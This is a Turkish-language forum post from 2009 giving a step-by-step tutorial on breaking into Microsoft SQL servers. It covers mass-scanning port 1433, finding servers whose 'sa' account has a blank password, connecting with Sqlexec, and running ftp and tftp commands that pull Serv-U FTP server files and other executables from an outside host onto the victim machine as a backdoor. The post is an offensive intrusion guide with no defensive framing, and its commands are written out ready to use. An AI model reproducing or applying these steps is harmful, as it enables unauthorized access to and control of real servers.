İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

SQL hacking

04-06-2009 13:53
#1
atlas_tr - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2008
Nereden:
NErDe OLsam BEğeNİRsin
Mesajlar:
2.383
Teşekkür (Etti):
19
Teşekkür (Aldı):
189
Konular:
389
Ticaret:
(0) %
Gerekli Materyaller:

SQL Scanner

SERV-U

Sqlexec

TFTP

Eveet Bu Yukarda Yazdiklarim Nedir Ne Ise Yarar Birazdan Görecegiz.

a) Ilk Önce Serv-u Yu Ayarlayip Portunu 4 Rakamli Konuma Getirecegiz. Örnek: 3275

b) SQL Scan Result Örnegin Su Sekilde Görünür: 127.0.0.1 Found Mssql account: sa/[Null]

Burdaki Gördügümüz "sa" Username "[Null]" ise Password\'dur. "[Null]" Bu Password Belirtilmemis Demektir.

c) Sqlexec\'i Aynen Bu Sekilde Ayarliyoruz. Username: sa Password: [Null]

d) Serv-u Icin Bir Path Yani Dizin Buluyoruz.

e) TFTP\'yi Kendi Bilgisayarimizda Calistiriyoruz.

f) SQL\'de Normal DOS Komutlari Gecerlidir. Dolayisiyla DOS Komutlariyla Calisacagiz.

g) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.ini c:Buraya Path serv-u.ini << Yazacagiz. Yani Serv-u.ini nin Yolunu Yazacagiz. Bu Komutla Serv-u.ini\'yi Aliyoruz.

h) c:winntsystem32 ftp.exe -i 172.185.14.77 get serv-u.exe c:Buraya Path serv-u.exe << Yazacagiz. Yani Serv-u.exe nin Yolunu Yazacagiz.

i) Sonra DirServ-u.exe Yaziyoruz. Bu Komutla Serv-u.exe\'mizi Calistiririz.

1) Scan Ve RecHecken:

Ilk Önce SQL Server Bulabilmemiz Icin SQL Server Scanner Bulmamiz Gerek. Bunu "Sfind.exe" Adli Programla Yapabiliriz. SQL Server\'lerin Port\'u 1433\'dür. Bununla Beraber Scan Yapiyoruz.

Scan Olayi Bittikten Sonra Scanner\'imiz Bize Bir Yigin IP Adresi Verecektir. Sifre Bulabilmemiz Icin Bu IP Adreslerini RecHecken Yapmamiz Lazim. Su Sekilde:

"SQLLHF.exe" Adli Dosyayi HDD\'mizin C Sürücüsüne Kopyeliyoruz. Sonra "Check_1.bat" Isimli Dosyayi HDD\'mizin C Sürücüsüne Kopyaliyoruz. Ayni Sekilde "Sfind.exe" Adli Scanner\'imize Ait Olan "Sfind.txt" Dosyasida C Sürücüsünde Olmalidir.

Sonra DOS\'u Aciyoruz Ve "Check_1.bat" Dosyasini Calistiriyoruz. O Otomatik Olarak Sfind.txt\'deki IP\'lere Ping Atacak. Bu Islem Yakla*** 5 Dakika Sürecektir.

Bu Arada bi cay molası verebilirsiniz =)

PING Olayi Bitti. Simdi Sonuclara Bakiyoruz. Örnegin: "Checking 127.xxx.xx.xx ::: Password not guessed" Su Sekilde Bir Yazi Varsa Bu Serveri Hackleyemeyiz. Ama Su Sekilde Olursa: "Checking 127.xxx.xx.xx ::: Password is blank!! <---- WARNING!" Iste O Zaman Hackleyebiliriz Demektir

2) Connecting Yani Hacking

"Sqlexec.exe" Adli Tool\'umuzu Calistiriyoruz. Buldugumuz IP Adresini Giriyoruz. Username\'yi Her Halukarda sa Olarak Ve Password\'u Blank Olarak Giriyoruz.

Simdi Asagiya "dir c:" Komutunu Veriyoruz. Veeee SQL Server\'in C Sürücüsüne Girmis Oluyoruz ))

Serv-u Dosyalarini TFTP\'ye Yüklemek Icin Su Komutlari Verebiliriz (IP Adresini Örnek Olarak Veriyorum):

tftp.exe -i 127.0.0.1 GET Servudaemon.exe c:server.exe
tftp.exe -i 127.0.0.1 GET TzoLibr.dll c: TzoLibr.dll
tftp.exe -i 127.0.0.1 GET winmgnt.exe c:winmgnt.exe
tftp.exe -i 127.0.0.1 GET httpodbc.dll c:httpodbc.dll
tftp.exe -i 127.0.0.1 GET ServUDaemon.ini c:ServUDaemon.ini
tftp.exe -i 127.0.0.1 GET speed.exe c:windowssystem32speed.exe ? ?
tftp.exe -i 127.0.0.1 GET 1.txt c:windowssystem321.txt )____ ?
tftp.exe -i 127.0.0.1 GET 2.txt c:windowssystem322.txt )

Yukarda Belirtmis Oldugum Tool Ve Programlari Google\'den Bulmaniz Gerekecek.
Kullanıcı İmzası


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı